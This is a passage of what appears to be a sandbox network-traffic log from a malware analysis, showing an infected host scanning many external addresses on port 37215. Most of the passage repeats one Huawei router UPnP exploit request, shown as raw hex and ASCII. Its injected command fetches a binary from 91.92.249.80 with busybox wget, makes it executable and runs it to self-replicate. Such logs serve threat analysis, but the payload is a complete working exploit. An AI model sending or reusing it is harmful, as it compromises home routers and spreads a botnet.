[TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2221192.168.2.2342316157.255.135.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663099051 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2222192.168.2.234933841.108.71.337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663224936 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2223192.168.2.2341292185.28.155.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663234949 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2224192.168.2.2336520101.140.29.11437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663255930 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2225192.168.2.2338938157.34.116.14037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663263083 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2226192.168.2.2349798197.99.196.3037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663276911 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2227192.168.2.233626041.38.184.10137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663288116 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2228192.168.2.233701241.23.35.12337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663429022 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2229192.168.2.2355984197.36.88.7137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663808107 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2230192.168.2.2344494180.253.208.24737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663870096 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2231192.168.2.2337332197.96.40.1037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.663952112 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
